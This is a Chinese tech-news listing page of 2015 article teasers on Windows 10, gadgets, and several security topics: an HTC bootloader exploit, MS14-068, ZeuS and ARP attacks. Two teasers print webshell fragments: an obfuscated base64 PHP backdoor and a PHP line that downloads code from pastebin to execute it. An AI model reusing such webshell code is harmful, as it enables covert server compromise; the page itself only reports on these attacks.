我们一起来看看微软官方博客带来的相关新特性说明，翻译刊发如下：1、桌面版微软小娜Cortana全新Win10预览版9926，正式集成了微软小娜Cortana语音助手。可以通过其搜索电脑中的文件、信息或是联网搜索某些你关心的问题。小娜Cortana将帮助你搜索Win10应用、设置，

来源：互联网　时间：2015-01-24　阅读次数：4716　

Win10技术预览版9926现已公开提供下载，本文为新手朋友们详解一下常用的硬盘安装Win10的方法。Win10技术预览版是微软发布的非正式版Win10系统，目的是让广大用户体验Win10全新功能，并希望获得更多改进建议，以便让Win10正式版更加完善，因此在使用过程中不可避免

来源：互联网　时间：2015-01-24　阅读次数：8225　

“没想到像中关村这么有名的地方，竟然会发生这种事……”连博士在中关村买电脑也被骗了！本周二，李先生（化名）在中关村鼎好电子商城内某商家处花6400元购买了某品牌的笔记本电脑，可回家一查发现该款电脑在网上的报价竟然只有3199元。第二天，他和6名博士好友

来源：互联网　时间：2015-01-24　阅读次数：809　

1月23日消息，文件夹视图是Win10/Win8.1/Win7等系统中调节文件夹中文件显示的一项重要功能。我们对于不同文件夹中文件的显示方式可能有不同要求，比如图片文件夹可能以大图标显示方式比较直观，而文档则要以详细信息方式显示便于查询。可是随着系统使用时间的变长

来源：互联网　时间：2015-01-23　阅读次数：1737　

HTCOne手机运行的是Android4.2.2、HBOOT1.54.0000，它存在一个名为Bootloader的漏洞。这个漏洞早在2014年2月份就报告给了HTC官方，并在次月就修复了该漏洞。在得到HTC官方同意后，我们现在就将整个漏洞利用测试过程发布出来。read_emmc命令在2011发布的HTCDesireZ

来源：互联网　时间：2015-01-23　阅读次数：3145　

FreeBuf科普：什么是Siri？Siri是苹果公司在其产品iPhone4S，iPadAir及以上版本手机上应用的一项语音控制功能。Siri可以令iPhone4S及以上（iPadAir）变身为一台智能化机器人，利用Siri用户可以通过手机读短信、介绍餐厅、询问天气、语音设置闹钟等。Siri可以支持

来源：互联网　时间：2015-01-23　阅读次数：1356　

1、所需工具下面列举了本次攻击演示所需要的所有工具：Windows/MacOSX/LinuxJava（推荐1.7版本）IDE（Eclipse，IntelliJIDEA，AndroidStudio，三者任选其一）AndroidSDK（https://developer.android.com/sdk/index.html?hl=i）APKTool（https://code.google.com/p

来源：互联网　时间：2015-01-23　阅读次数：2667　

据9to5Mac报道，苹果今年发布的新款12英寸MacBookAir中，可能会去除全尺寸USB接口、MagSafe电源接口、Thunderbolt显示屏接口和SD读卡器，而改用单USB-C型接口。这款笔记本将比11寸的MacBookAir还薄大约四分之一英寸。它被视为2012年Retina屏推出后，苹果笔记本最

来源：互联网　时间：2015-01-23　阅读次数：1654　

0×0背景微软（2014-11-18）发布了一个紧急补丁，修复了一个影响全部版本Windows服务器的严重漏洞。今天发布的MS14-068漏洞补丁用于解决MicrosoftWindowsKerberosKDC漏洞（CVE-2014-6324），该漏洞允许黑客提升任意普通用户权限成为域管理员（DomainAdmin）身份。

来源：互联网　时间：2015-01-22　阅读次数：2113　

--华为mate7卡刷步骤1.首先将下载来的*.zip刷机包解压，刷机包主文件名为：UPDATE.APP，在dload文件夹下，我们将dload整个文件夹拷贝到手机内(文件夹内包含刷机包)如图：2.确认刷机包已经放入dload文件夹下，然后将手机关机;关机状态下同时按拙音量上键】、【音量

来源：互联网　时间：2015-01-22　阅读次数：1332　

说到Zeus／Zbot，做安全多多少少都会有所了解。Zeus是对金融系统威胁最大的僵尸网络之一，控制者借助僵尸程序窃取账户登录信息和信用卡号码。Zbot往往通过垃圾邮件来传播，中招的会下载一个程序，这个程序会控制网银，偷取信息。近期卡巴斯基实验室发现了一款ZeuS

来源：互联网　时间：2015-01-22　阅读次数：1924　

引用：前日起（12月10日）全球互联网范围DNS流量异常。云堤团队（DamDDoS）迅速参与分析处置。本次事件攻击自12月10日凌晨起至今仍在持续，为近年来持续时间最长的DNSDDoS攻击，目前已监测到的攻击最大流量近1亿Qps（约合76.38Gbps）跟踪：12月10日,DNS异常故障时

来源：互联网　时间：2015-01-22　阅读次数：1258　

测试环境说明网关：IP：172.20.150.1mac：24050FCE53靶机（手机）：IP：172.20.150.20mac：000822D806D2攻击主机（虚拟机）：IP：172.20.150.2mac：6C40089A1F16Wifi接入点（360免费wifi）：BSSID：24050FCE53（就是网关的mac），SSID：private（wifi名称）攻击场

来源：互联网　时间：2015-01-22　阅读次数：1586　

一次巡查服务器的时候，发现网站存在漏洞，并已被植入后门。因为服务器有安全狗，由此断定后门代码是免杀的。首先我们看看加密的源码其中加色部分$drx.$ydd.$hq.$qvz按照排列依次拼接“CiRoaCAgc9ICJwIi4iciIuImUiLiJnIi4iXyIuInIiLiJlIigc4icgcCIuImwiLiJhgcIi4i

来源：互联网　时间：2015-01-21　阅读次数：2993　

这两天某国外黑客写了一篇文章关于他发现的一种webshell中使用的手法，大体说说思路，原文就不翻译了，我懒。简单来说就是通过一个很简单的代码远程通过pastebin下载代码并且执行。if(array_keys($_GET)[0]=='up'){$content=file_get_contents('http://pastebin.c

来源：互联网　时间：2015-01-21　阅读次数：1683